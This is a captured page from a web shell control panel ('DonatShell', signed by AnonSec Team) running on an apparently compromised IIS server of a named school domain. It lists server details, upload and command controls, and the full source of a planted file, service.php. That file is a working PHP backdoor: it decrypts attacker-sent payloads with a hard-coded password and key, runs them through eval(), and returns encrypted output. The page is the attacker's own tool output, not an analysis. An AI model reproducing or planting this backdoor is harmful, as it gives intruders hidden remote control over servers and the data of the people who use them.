%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/img_slide/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/inetpub/wwwroot/img_slide/service.php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encryption($data, $mode,$key) {
    $result = false;
    $iv = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    $blocksize = 16;
    $size = strlen($data)%16;
    if (function_exists("openssl_encrypt") && $mode<2) {
        if ($mode == 1) {
            $pad = $blocksize - (strlen($data) % $blocksize);
            $data.= str_repeat(chr($pad), $pad);
            $result = @openssl_encrypt($data, "AES-128-ECB", $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,$iv);
        } else if (!$size){
            $result = @openssl_decrypt($data, "AES-128-ECB", $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,$iv);
        }
    } else if (function_exists("mcrypt_encrypt")&&$mode<2) {
        if ($mode == 1) {
            $pad = $blocksize - (strlen($data) % $blocksize);
            $data.= str_repeat(chr($pad), $pad);
            $result = @mcrypt_encrypt("rijndael-128", $key, $data, "ecb", $iv);
        } else if (!$size){
            $result = @mcrypt_decrypt("rijndael-128", $key, $data, "ecb", $iv);
        }
    }
    if (!$result)
    {
        $len = strlen($data);
        $keyLen = strlen($key);
        $index = 0;
        for ($i = 1; $i <= $len; $i++) {
            $index = $i - 1;
            $data[$index] = $data[$index] ^ $key[($i % $keyLen)];
        }
        return $data;
    }
    if ($mode == 0) {
        $pad = ord($result {
        strlen($result) - 1
        });
        if ($pad > strlen($result)) return false;
        if (strspn($result, chr($pad), strlen($result) - $pad) != $pad) return false;
        $result = substr($result, 0, -1 * $pad);
    }
    return $result;
}

$pass = 'pass';
$payloadName = 'payload';
$key = '3c6e0b8a9c15224a';
if (isset($_POST[$pass])) {
    $data = base64_decode($_POST[$pass]);
    if (isset($_SESSION[$payloadName])) {
        $payload = encryption($_SESSION[$payloadName],0, $key);
        if (strpos($payload, "getBasicsInfo") === false) {
            $payload = encryption($_SESSION[$payloadName],0, $key);
        }
        $data = encryption($data,0, $key);
        eval($payload);
        echo substr(md5($pass.$key), 0, 16);
        echo base64_encode(encryption(@run($data),1,$key));
        echo substr(md5($pass.$key), 16);
    } else {
        $data = encryption($data,2,$key);
        if (strpos($data, "getBasicsInfo") !== false) {
            $_SESSION[$payloadName] = encryption($data,1, $key);
        }
    }
}

Anon7 - 2022
AnonSec Team